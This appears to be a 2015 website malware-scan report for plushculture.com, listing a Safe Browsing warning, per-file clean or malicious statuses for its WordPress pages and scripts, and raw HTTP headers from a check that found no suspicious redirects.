Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=plushculture.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://plushculture.com/ | 200 OK Content-Length: 16536 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
http://plushculture.com/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://plushculture.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/wp-e-commerce.js?ver=3.8.9.4.637865 | 200 OK Content-Length: 30065 Content-Type: application/javascript | clean |
http://plushculture.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/jquery.infieldlabel.min.js?ver=3.8.9.4.637865 | 200 OK Content-Length: 1787 Content-Type: application/javascript | clean |
http://plushculture.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/ajax.js?ver=3.8.9.4.637865 | 200 OK Content-Length: 2693 Content-Type: application/javascript | clean |
http://plushculture.com/index.php?wpsc_user_dynamic_js=true&ver=3.8.9.4.637865 | 200 OK Content-Length: 1000 Content-Type: text/javascript | clean |
http://plushculture.com/wp-content/plugins/wp-e-commerce/wpsc-admin/js/jquery.livequery.js?ver=1.0.3 | 200 OK Content-Length: 6714 Content-Type: application/javascript | clean |
http://plushculture.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/user.js?ver=3.8.9.4637865 | 200 OK Content-Length: 14672 Content-Type: application/javascript | clean |
http://plushculture.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/thickbox.js?ver=Instinct_e-commerce | 200 OK Content-Length: 14444 Content-Type: application/javascript | clean |
http://plushculture.com/wp-includes/js/jquery/jquery.query.js?ver=2.1.7 | 200 OK Content-Length: 3788 Content-Type: application/javascript | clean |
http://plushculture.com/wp-content/plugins/gold_cart_plugin/js/gold_cart.js?ver=3.5 | 200 OK Content-Length: 4373 Content-Type: application/javascript | clean |
http://plushculture.com/wp-content/themes/responsive/js/responsive-modernizr.js?ver=2.6.1 | 200 OK Content-Length: 15117 Content-Type: application/javascript | clean |
http://plushculture.com/wp-content/themes/responsive/js/responsive-scripts.js?ver=1.2.1 | 200 OK Content-Length: 11074 Content-Type: application/javascript | clean |
http://plushculture.com/wp-content/themes/responsive/js/responsive-plugins.js?ver=1.1.1 | 200 OK Content-Length: 1082 Content-Type: application/javascript | clean |
http://plushculture.com/?page_id=4 | 200 OK Content-Length: 17154 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: plushculture.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 25 Jan 2015 04:08:56 GMT
Pragma: no-cache
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
Content-Encoding: none
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=9816193a6045889a9fe1baed517e1eae; path=/
Set-Cookie: wpsc_customer_cookie_38ba906d094bb246b9b74eb964a1d9d4=_m4om99hvxEqu%7C1422331737%7C93b7ef8e04a5f62f0d8ead3129eed601; expires=Tue, 27-Jan-2015 04:08:57 GMT; path=/; httponly
X-Pingback: http://plushculture.com/xmlrpc.php
X-Powered-By: PHP/5.4.30
Second query (visit from search engine):
GET / HTTP/1.1
Host: plushculture.com
Referer: http://www.google.com/search?q=plushculture.com
Result:
The result is similar to the first query. There are no suspicious redirects found.